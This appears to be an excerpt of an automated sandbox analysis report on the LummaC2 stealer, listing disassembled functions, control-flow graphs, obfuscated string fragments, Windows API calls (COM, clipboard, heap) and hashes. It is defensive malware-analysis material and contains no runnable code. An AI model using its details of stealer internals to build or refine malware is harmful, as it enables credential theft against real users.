                                              • Instruction Fuzzy Hash: EF816E73A543184FD318AF69DC8537AFAD69BC4300F0F813D9988EB391DEB49C098692
                                              Function 00E32D3B Relevance: 5.2, Strings: 4, Instructions: 189COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 66 e32d3b-e32d4d call e31d20 69 e32d71-e32dd8 66->69 70 e32d4f-e32d54 66->70 72 e32de0-e32dfe 69->72 71 e32d60-e32d6f 70->71 71->69 71->71 72->72 73 e32e00-e32e08 72->73 74 e32e76-e32e88 call e31d20 73->74 75 e32e0a-e32e16 73->75 81 e32ea1-e32f1f 74->81 82 e32e8a-e32e8f 74->82 77 e32e20-e32e27 75->77 79 e32e30-e32e37 77->79 80 e32e29-e32e2c 77->80 79->74 84 e32e39-e32e53 call e323f0 79->84 80->77 83 e32e2e 80->83 86 e32f20-e32f3e 81->86 85 e32e90-e32e9f 82->85 83->74 84->74 85->81 85->85 86->86 88 e32f40-e32f4d 86->88 90 e32f53-e32f5f 88->90 91 e32e60-e32e73 88->91 92 e32f60-e32f68 90->92 91->74 93 e32f80-e32f87 92->93 94 e32f6a-e32f6d 92->94 93->91 96 e32f8d-e32f9f call e323f0 93->96 94->92 95 e32f6f 94->95 95->91 98 e32fa4-e32fa7 96->98 98->91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$R_XY$he$he
                                              • API String ID: 0-2939806299
                                              • Opcode ID: d677fe659fdfd59812ba93dc50ea45e60b25525f49b422b51f238b1fa58ba166
                                              • Instruction ID: 2bdd704f87e9cae7463d7edf8042b60c585089d0eca18a470b7f6bdbfafce50d
                                              • Opcode Fuzzy Hash: d677fe659fdfd59812ba93dc50ea45e60b25525f49b422b51f238b1fa58ba166
                                              • Instruction Fuzzy Hash: 615190701083048FD714CF15D899B6BBBF2FFD5318F549A2CE695A72A1E73A8805CB52
                                              Function 00E323F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 109 e323f0-e32422 LdrInitializeThunk
                                              APIs
                                              • LdrInitializeThunk.NTDLL(00E35730,?,00000018,?,?,00000018,?,?,?), ref: 00E3241E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                              Function 00E32610 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 105 e32610-e3275a GetForegroundWindow call e34560 108 e3275f-e32779 105->108
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00E3274F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: ForegroundWindow
                                              • String ID:
                                              • API String ID: 2020703349-0
                                              • Opcode ID: e3127d8bb34b921cc09dafce32c43fc8bd341984f854adacb6c095bea373c1d6
                                              • Instruction ID: 96b3d4aa63ae3d5673f0a0bfa8993c74819fc96bd10a0a42f87ad0ff3a698991
                                              • Opcode Fuzzy Hash: e3127d8bb34b921cc09dafce32c43fc8bd341984f854adacb6c095bea373c1d6
                                              • Instruction Fuzzy Hash: 4BE0C2BAA04145DFC708CF16FD094343FB0A78A308700141DE207E33A1D634650ECB52
                                              Function 00E30B80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 110 e30b80-e30b97 call e33b10 RtlAllocateHeap
                                              APIs
                                              • RtlAllocateHeap.NTDLL(?,00000000,?,00000000,00DF89C0,23220120), ref: 00E30B90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: adf6f4f1a9dec73bf75c398ebc657ed33b2853beaef29f8eb0362b262692901a
                                              • Instruction ID: 04e75b4c79c7b9c80edd558225b63d0af8e6297aa244fe07bc9c130e08ebdb2e
                                              • Opcode Fuzzy Hash: adf6f4f1a9dec73bf75c398ebc657ed33b2853beaef29f8eb0362b262692901a
                                              • Instruction Fuzzy Hash: D3C09B31545120AFC6102B25FC09FC67FA8FF46351F050451B00477076C765AC53C6D5

                                              Non-executed Functions

                                              Function 00E02E60 Relevance: 156.1, APIs: 3, Strings: 85, Instructions: 2110COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$&$'$($+$,$-$-H!a$-H!a$/$1$2$3$4%jm$4%j$4%j$:$<$=$>$>$?$?$@$A$B$C$D$D$D$E$G$I$J$L$M$M$N$N$O$O$P$P$R$T$U$U$V$W$Z$[$`$`$a$b$c$d$e$f$g$h$h$i$j$j$k$l$m$n$n$o$p$q$r$s$u$u$w$w$x$y$z${$}$~
                                              • API String ID: 0-1262017598
                                              • Opcode ID: fc67add124b3cd90ee84e41055c622bf9e2596454094b3e6e0a0a1366106c8de
                                              • Instruction ID: 9a61e6e1eebacb8e11bb835f0480698064da1e3d18e0549dcee174765a6d5016
                                              • Opcode Fuzzy Hash: fc67add124b3cd90ee84e41055c622bf9e2596454094b3e6e0a0a1366106c8de
                                              • Instruction Fuzzy Hash: 3013F1B150C7C08AD334DB3888483AFBFD1AB96324F188A2DE5E9973D2D77985858753
                                              Function 00E2B8C5 Relevance: 55.4, Strings: 44, Instructions: 354COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 667 e2b8c5-e2bbb7 668 e2bbbc-e2bbcc 667->668 668->668 669 e2bbce 668->669 670 e2bbd0-e2bbd5 669->670 671 e2bbd7-e2bc1d 670->671 672 e2bc1f-e2bc58 670->672 671->670 673 e2bc5a-e2bc5d 672->673 674 e2bc76-e2bd0d 673->674 675 e2bc5f-e2bc74 673->675 676 e2bd12-e2bd20 674->676 675->673 676->676 677 e2bd22 676->677 678 e2bd24-e2bd27 677->678 679 e2bd65-e2bd99 678->679 680 e2bd29-e2bd63 678->680 681 e2bd9b-e2bd9e 679->681 680->678 682 e2bda0-e2bdb5 681->682 683 e2bdb7-e2be1c 681->683 682->681 684 e2be21-e2be2f 683->684 684->684 685 e2be31 684->685 686 e2be33-e2be36 685->686 687 e2be65-e2be6b 686->687 688 e2be38-e2be63 686->688 689 e2be6d-e2be73 687->689 688->686 690 e2be75 689->690 691 e2be7a-e2be8c 689->691 692 e2bf00-e2bf22 690->692 693 e2be90-e2be97 691->693 694 e2be8e 691->694 695 e2bef1-e2bef4 693->695 696 e2be99-e2beee call e323f0 693->696 694->695 698 e2bef6 695->698 699 e2bef8-e2befb 695->699 696->695 698->692 699->689
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !$$$&$($*$0$4$5$6$6$<$=$>$A$A$A$C$E$G$I$K$M$O$Q$S$U$W$Y$[$\$]$]$_$c$g$h$k$l$u$w$w$z$}$}
                                              • API String ID: 0-4139699962
                                              • Opcode ID: 96f62e82473549ecfce5c989dd62f1cc802a05f55cd8489a30100b4a68338305
                                              • Instruction ID: 3dfac53d8f76d98d7c93289d58aaa4f2ab50217bbb18f414ee29856e57fe949a
                                              • Opcode Fuzzy Hash: 96f62e82473549ecfce5c989dd62f1cc802a05f55cd8489a30100b4a68338305
                                              • Instruction Fuzzy Hash: 2C121C219087E9C9DB32C67C8C087DDBFA15B63324F1843D9D4E96B2D2D7750A86CB62
                                              Function 00E14ADF Relevance: 40.4, Strings: 32, Instructions: 385COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 701 e14adf-e14ccf 702 e14cd4-e14ce2 701->702 702->702 703 e14ce4 702->703 704 e14ce6-e14ce9 703->704 705 e14d25-e14d5c 704->705 706 e14ceb-e14d23 704->706 707 e14d61-e14d6f 705->707 706->704 707->707 708 e14d71 707->708 709 e14d73-e14d76 708->709 710 e14db8-e14e1f 709->710 711 e14d78-e14db6 709->711 712 e14e24-e14e32 710->712 711->709 712->712 713 e14e34 712->713 714 e14e36-e14e39 713->714 715 e14e72-e151ba call df92d0 * 5 714->715 716 e14e3b-e14e70 714->716 727 e151bf-e151cd 715->727 716->714 727->727 728 e151cf 727->728 729 e151d1-e151d4 728->729 730 e151f3-e1523f 729->730 731 e151d6-e151f1 729->731 732 e15244-e15252 730->732 731->729 732->732 733 e15254 732->733 734 e15256-e15259 733->734 735 e1525b-e1528b 734->735 736 e1528d-e152e4 call dfbad0 734->736 735->734
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,$,$.$.$2$8$;$<$H$I$M$O$O$P$Q$X$]$]$^$a$b$c$h$m$m$t$v$w${$|$|$y
                                              • API String ID: 0-1314618608
                                              • Opcode ID: e38219a34bdc55aa6d4ea441d29cb5bd84c9d157b128e05656db25ee55b5437f
                                              • Instruction ID: 0b92479cbe13022fb6dcf7591d6a2c61b5766aa4b261edfd897b98bc2d3ca61a
                                              • Opcode Fuzzy Hash: e38219a34bdc55aa6d4ea441d29cb5bd84c9d157b128e05656db25ee55b5437f
                                              • Instruction Fuzzy Hash: 9F32D021908BEAC9DB32863C4C583DDBE611B67334F0847D9D1F96A3E2D3750A85CB66
                                              Function 00E2D9A0 Relevance: 28.8, APIs: 10, Strings: 6, Instructions: 787memorycomCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 739 e2d9a0-e2d9e4 740 e2d9f0-e2da23 739->740 740->740 741 e2da25-e2da5a 740->741 742 e2da60-e2da92 741->742 742->742 743 e2da94-e2dad4 742->743 744 e2dae0-e2db26 743->744 744->744 745 e2db28-e2db4a 744->745 747 e2db50-e2db62 745->747 748 e2dc38-e2dc59 745->748 750 e2db70-e2dbbc 747->750 749 e2dc60-e2dc92 748->749 749->749 751 e2dc94-e2dd0f 749->751 750->750 752 e2dbbe-e2dbd9 750->752 753 e2dd10-e2dd24 751->753 754 e2dbe0-e2dc17 752->754 753->753 755 e2dd26-e2dd7b 753->755 754->754 756 e2dc19-e2dc31 754->756 757 e2dd80-e2dd94 755->757 756->748 757->757 758 e2dd96-e2dde7 CoCreateInstance 757->758 759 e2e250-e2e275 call e33f40 758->759 760 e2dded-e2de1f 758->760 767 e2e277-e2e27b 759->767 768 e2e27f-e2e281 759->768 761 e2de20-e2de34 760->761 761->761 763 e2de36-e2de68 SysAllocString 761->763 769 e2de6e-e2de88 CoSetProxyBlanket 763->769 770 e2e23c-e2e24c SysFreeString 763->770 767->768 771 e2e29d-e2e2a4 768->771 772 e2e232-e2e238 769->772 773 e2de8e-e2deb9 769->773 770->759 774 e2e2b0-e2e2cf 771->774 775 e2e2a6-e2e2ad 771->775 772->770 776 e2dec0-e2deea 773->776 777 e2e2d0-e2e2e4 774->777 775->774 776->776 778 e2deec-e2df88 SysAllocString 776->778 777->777 779 e2e2e6-e2e321 777->779 780 e2df90-e2e02a 778->780 782 e2e330-e2e35b 779->782 780->780 781 e2e030-e2e064 SysAllocString 780->781 786 e2e06a-e2e08c 781->786 787 e2e21e-e2e22f SysFreeString * 2 781->787 782->782 783 e2e35d-e2e382 call e0e710 782->783 789 e2e390-e2e398 783->789 792 e2e092-e2e095 786->792 793 e2e214-e2e21a 786->793 787->772 789->789 791 e2e39a-e2e3a8 789->791 794 e2e290-e2e297 791->794 795 e2e3ae-e2e3be call df8160 791->795 792->793 798 e2e09b-e2e0a0 792->798 793->787 794->771 797 e2e3c3-e2e3ca 794->797 795->794 798->793 800 e2e0a6-e2e0ff VariantInit 798->800 801 e2e100-e2e11c 800->801 801->801 802 e2e11e-e2e13a 801->802 804 e2e203-e2e210 VariantClear 802->804 805 e2e140-e2e146 802->805 804->793 805->804 806 e2e14c-e2e15d 805->806 807 e2e15f-e2e164 806->807 808 e2e19d 806->808 809 e2e17c-e2e180 807->809 810 e2e19f-e2e1ca call df7fd0 call df8df0 808->810 811 e2e182-e2e18b 809->811 812 e2e170 809->812 821 e2e1eb-e2e1ff call df7fe0 810->821 822 e2e1cc-e2e1d6 810->822 815 e2e192-e2e196 811->815 816 e2e18d-e2e190 811->816 814 e2e171-e2e17a 812->814 814->809 814->810 815->814 818 e2e198-e2e19b 815->818 816->814 818->814 821->804 822->821 824 e2e1d8-e2e1e2 822->824 824->821 826 e2e1e4-e2e1e7 824->826 826->821
                                              APIs
                                              • CoCreateInstance.OLE32(?,00000000,00000001,?,00000000), ref: 00E2DDDC
                                              • SysAllocString.OLEAUT32(09BB0FE3), ref: 00E2DE37
                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00E2DE80
                                              • SysAllocString.OLEAUT32(25F52BC5), ref: 00E2DEF1
                                              • SysAllocString.OLEAUT32(346A3696), ref: 00E2E035
                                              • VariantInit.OLEAUT32(?), ref: 00E2E0AB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                              • String ID: On6l$QMNO$a2n0$an$if$zA
                                              • API String ID: 65563702-1173067894
                                              • Opcode ID: e324a232b5b53c0d8f690fc621a8a2cd5ca3b91a3498f24199a2104144f6f6a1
                                              • Instruction ID: d9dcff76904ab011063b9dfce659b036dd07ff00ca7eb4db814ac257bff81b69
                                              • Opcode Fuzzy Hash: e324a232b5b53c0d8f690fc621a8a2cd5ca3b91a3498f24199a2104144f6f6a1
                                              • Instruction Fuzzy Hash: 6742DB726083509FD324CF69D885BABBBE1EFC5314F18892CE5D99B390D778D8058B52
                                              Function 00E17261 Relevance: 23.3, Strings: 18, Instructions: 789COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !s#m$"G7A$#o+i$6g,a$JM$NB$OJ$V3}-$XQZ[$c/~)$eMLO$mj$rOlm$rs$z+@%$~OG$K-U${u
                                              • API String ID: 0-1125961338
                                              • Opcode ID: 8226571744a96fa97b1e80eca7823e1f6a50d95f7f641314e5fcbfaced8a3190
                                              • Instruction ID: 4c318d06b5989cca78ccf5609f6260ecb203ab66138c83dda1b031fe1fc2390b
                                              • Opcode Fuzzy Hash: 8226571744a96fa97b1e80eca7823e1f6a50d95f7f641314e5fcbfaced8a3190
                                              • Instruction Fuzzy Hash: 8A723FB560C3848AD334CF25C452B9FBAF1FB91304F04882DD5D9AB252DBB5894ACB87
                                              Function 00E0151F Relevance: 21.9, APIs: 2, Strings: 10, Instructions: 871COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: &$1$5$7$>$@$E$S$w$y
                                              • API String ID: 0-3428255093
                                              • Opcode ID: fc321f4a1791fcbab2abf56301e3e8667368204623935bac10cdd6c2e1b1e760
                                              • Instruction ID: 4f107e24c6b915313e0d15f49af39840a49b248e06066823999edd421262ae0e
                                              • Opcode Fuzzy Hash: fc321f4a1791fcbab2abf56301e3e8667368204623935bac10cdd6c2e1b1e760
                                              • Instruction Fuzzy Hash: 6D72E372A0D7808BC3249B38C4953AFBBD1AFD5324F198A6EE5E9D73C1D63489418B53
                                              Function 00DFE4F3 Relevance: 17.8, Strings: 14, Instructions: 258COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4N"L$5VwT$9B*@$>J6H$B*^($CvWt$D$P"J $Sz{x$VFgD$X2K0$fR/P$q^`\$}ZhX
                                              • API String ID: 0-2380368552
                                              • Opcode ID: 48f82d95e422fde914bd29569bd4b64c4f47fc8ce61d66d03b9b9cf84de30840
                                              • Instruction ID: 83af7f0b49934dacbc25b456f29add4eb060d7af51f57c8f247579372a87bc9d
                                              • Opcode Fuzzy Hash: 48f82d95e422fde914bd29569bd4b64c4f47fc8ce61d66d03b9b9cf84de30840
                                              • Instruction Fuzzy Hash: 3BB110B04083818FE7208F55C59576BBBF0FF81B48F64990CE2D91B2A1D3BA8545CF96
                                              Function 00E02246 Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 561COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;$G$K$d$e$f$g
                                              • API String ID: 0-2683299700
                                              • Opcode ID: 6f71cef6164c61c64ed0dda4bcfa69b6f886b32440a47a020081c25c6539983c
                                              • Instruction ID: f4029abb7936af601fa6f3bb3934042ef0eddd5ae80d60994fd9211184cac36c
                                              • Opcode Fuzzy Hash: 6f71cef6164c61c64ed0dda4bcfa69b6f886b32440a47a020081c25c6539983c
                                              • Instruction Fuzzy Hash: 1C22D571A0C7808BD7249B38C4993AFBBE1AFD5324F198A6DD9DD973C1D63948808B53
                                              Function 00E1686D Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 404COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00E1689D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: 1R8P$<B<@$Eb6`$T$qE$t~$|N
                                              • API String ID: 237503144-4112981121
                                              • Opcode ID: 1c5a3617ad9919bc8cc2a8897e6a50d016e8d45686107563e9350e7bbeae94a9
                                              • Instruction ID: c211b34d6756f7aec1ef6a9ffaad1ce01507a617c65a2604b2368414fbe9baa5
                                              • Opcode Fuzzy Hash: 1c5a3617ad9919bc8cc2a8897e6a50d016e8d45686107563e9350e7bbeae94a9
                                              • Instruction Fuzzy Hash: 85D1A8B0508344CFD714CF25D8917ABBBE0FF85344F049A2CF696AB261E7799948CB92
                                              Function 00E278A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: Clipboard$CloseDataGlobalLockOpen
                                              • String ID: :
                                              • API String ID: 1494355150-336475711
